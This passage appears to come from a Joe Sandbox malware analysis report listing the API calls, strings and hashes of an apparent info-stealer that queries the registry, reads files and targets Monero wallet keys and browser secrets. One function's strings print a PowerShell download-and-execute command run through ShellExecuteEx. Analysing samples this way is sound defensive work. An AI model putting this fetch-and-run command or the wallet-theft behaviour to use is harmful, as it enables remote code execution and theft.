                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: acb899998d724b7a63080e0aa6ea5008dec1a57e4b1341098dccbd744053bee6
                        • Instruction ID: 3c9095623887e1a4c72b962a2cafb17973208b960c3634d870ebc4a82f018fa2
                        • Opcode Fuzzy Hash: acb899998d724b7a63080e0aa6ea5008dec1a57e4b1341098dccbd744053bee6
                        • Instruction Fuzzy Hash: CB2116B1911228ABDB24DB54DC95FE9B3B8FB48700F00C5D9E609A7180DF71AA85CFE4
                        Function 009A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,015AB690,00000000,00020119,00000000), ref: 009A76DD
                        • RegQueryValueExA.ADVAPI32(00000000,015BD890,00000000,00000000,?,000000FF), ref: 009A76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 1a0e5b7a520c133cbba4f1e80366e5bdac21dff8dfe78192a4107baf899f555b
                        • Instruction ID: 12ccdcbad67dfdd66acb2e00fe0570130e96934ce30dc1ab2095afdccf71d88a
                        • Opcode Fuzzy Hash: 1a0e5b7a520c133cbba4f1e80366e5bdac21dff8dfe78192a4107baf899f555b
                        • Instruction Fuzzy Hash: AB014FB5A45304BBDB00DBE4DD6AFAAF7BCEB48701F104455FA0497290EA7599009B91
                        Function 009A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A773B
                        • RegOpenKeyExA.ADVAPI32(80000002,015AB690,00000000,00020119,009A76B9), ref: 009A775B
                        • RegQueryValueExA.ADVAPI32(009A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009A777A
                        • RegCloseKey.ADVAPI32(009A76B9), ref: 009A7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 5e6f06e47fc9594ebf6a269b2dd1f5e0642f1cbee3eda3df006fcc7baf37b573
                        • Instruction ID: f1d22282363d8a94a10261309c904f3396ec688a8a139cb48a8d585c7a7bd085
                        • Opcode Fuzzy Hash: 5e6f06e47fc9594ebf6a269b2dd1f5e0642f1cbee3eda3df006fcc7baf37b573
                        • Instruction Fuzzy Hash: 550162B9A40308BBDB00DFE0DC5AFAEF7B8EB48700F004559FA05A7281EA715A008B91
                        Function 009A40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 009A40D5
                        • RegOpenKeyExA.ADVAPI32(80000001,015BD138,00000000,00020119,?), ref: 009A40F4
                        • RegQueryValueExA.ADVAPI32(?,015BDC20,00000000,00000000,00000000,000000FF), ref: 009A4118
                        • RegCloseKey.ADVAPI32(?), ref: 009A4122
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4147
                        • lstrcat.KERNEL32(?,015BDCC8), ref: 009A415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: e11c9dc26b87373c2431624ee1e02f00ddfbd1b9454d624900b6193a4460d11f
                        • Instruction ID: 13ecb671793db5b82f96d7ca5a8d877508588b5bf744090eafcbb38182cd54d4
                        • Opcode Fuzzy Hash: e11c9dc26b87373c2431624ee1e02f00ddfbd1b9454d624900b6193a4460d11f
                        • Instruction Fuzzy Hash: 2B4195B6D101086BDB14EBA0DC56FEEB33DBB89300F408559B61657181FE755B888BD2
                        Function 009999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                        • LocalFree.KERNEL32(0099148F), ref: 00999A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 33f215fa6700b9b71c8570c9bd0cc3676245c5b2c1287c759c384db0338ae3e5
                        • Instruction ID: 1561c91ca0e1d1fd0ac7893fe8f1a26195839f46f588512957faa618388e1372
                        • Opcode Fuzzy Hash: 33f215fa6700b9b71c8570c9bd0cc3676245c5b2c1287c759c384db0338ae3e5
                        • Instruction Fuzzy Hash: 35312B74A01209EFDF14CF98C895BAEB7F9FF48341F108158E901A7290DB78AA41CFA1
                        Function 009AC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: 6e81b3d9aa557a08bd162729e85e81e230ab1624c1a120780047b8f6c4fda46a
                        • Instruction ID: 1ea3a744f1888565ec488a26f2d4c9f7d5cce3bff8aa3a264647bd9401c9fe81
                        • Opcode Fuzzy Hash: 6e81b3d9aa557a08bd162729e85e81e230ab1624c1a120780047b8f6c4fda46a
                        • Instruction Fuzzy Hash: F641E9B150475C9FDB218B24CD84FFB7BEDAF86704F1444E8E58A8A182D2759A44DFA0
                        Function 009A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,015BDBD8), ref: 009A47DB
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4801
                        • lstrcat.KERNEL32(?,?), ref: 009A4820
                        • lstrcat.KERNEL32(?,?), ref: 009A4834
                        • lstrcat.KERNEL32(?,015AB360), ref: 009A4847
                        • lstrcat.KERNEL32(?,?), ref: 009A485B
                        • lstrcat.KERNEL32(?,015BD118), ref: 009A486F
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8D90: GetFileAttributesA.KERNEL32(00000000,?,00991B54,?,?,009B564C,?,?,009B0E1F), ref: 009A8D9F
                          • Part of subcall function 009A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009A4580
                          • Part of subcall function 009A4570: RtlAllocateHeap.NTDLL(00000000), ref: 009A4587
                          • Part of subcall function 009A4570: wsprintfA.USER32 ref: 009A45A6
                          • Part of subcall function 009A4570: FindFirstFileA.KERNEL32(?,?), ref: 009A45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: dc839f7599ecbc38f9ad450175e271d4f8751556a487834b5bf09cb8fd5f061a
                        • Instruction ID: 4f26fcbd9cafd3fc0df9207016253cfc4408f0920d62449cb1210cfa05798bf8
                        • Opcode Fuzzy Hash: dc839f7599ecbc38f9ad450175e271d4f8751556a487834b5bf09cb8fd5f061a
                        • Instruction Fuzzy Hash: 0C3151B2D0020867CB14FBB0DC95FEE737CAB98700F404989B75996091EE74A789CBD6
                        Function 009A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A2D85
                        Strings
                        • ')", xrefs: 009A2CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009A2CC4
                        • <, xrefs: 009A2D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009A2D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 49d35e3d704cfb88ec600b0dc697d096c8a8146fc97aaefdac9f604ff632c61c
                        • Instruction ID: 1a11c449ba37bfff9afd16a8eaec4106397268f15dd7fe66751ee088208e193c
                        • Opcode Fuzzy Hash: 49d35e3d704cfb88ec600b0dc697d096c8a8146fc97aaefdac9f604ff632c61c
                        • Instruction Fuzzy Hash: 3541DC71D102089BDB54EFA4C896BEEBB78AF91300F504119F006A7191EF746A4ACFD5
                        Function 00999E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00999F41
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 6817c4e73d317504258d45d751a2d1b48f392d4465fe69af92ceb6878555bd62
                        • Instruction ID: b6577a533ae695952aaf8271727943e75a1c521c4902379c79aeddd8971f2768
                        • Opcode Fuzzy Hash: 6817c4e73d317504258d45d751a2d1b48f392d4465fe69af92ceb6878555bd62
                        • Instruction Fuzzy Hash: C2612F71A102489FDF24EFA8CD96FEE7775AF85304F008518F90A5B191EB746A05CB92
                        Function 009A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 009A696C
                        • sscanf.NTDLL ref: 009A6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009A69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009A69C0
                        • ExitProcess.KERNEL32 ref: 009A69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 888b5e8c62908a934cf7702f5e50a89b346df4ad018c66decf6128361c15d881
                        • Instruction ID: f5f4e71bb9948d4aa46a86b8760c730ce8514f55ab1d38a52aa14bb67302b541
                        • Opcode Fuzzy Hash: 888b5e8c62908a934cf7702f5e50a89b346df4ad018c66decf6128361c15d881
                        • Instruction Fuzzy Hash: BC21FAB5D00208ABCF04EFE8D955AEEB7B9FF48300F04852EE416E3250EB355604CBA9
                        Function 009A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,015ABA10,00000000,00020119,?), ref: 009A7E5E
                        • RegQueryValueExA.ADVAPI32(?,015BD238,00000000,00000000,000000FF,000000FF), ref: 009A7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 009A7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
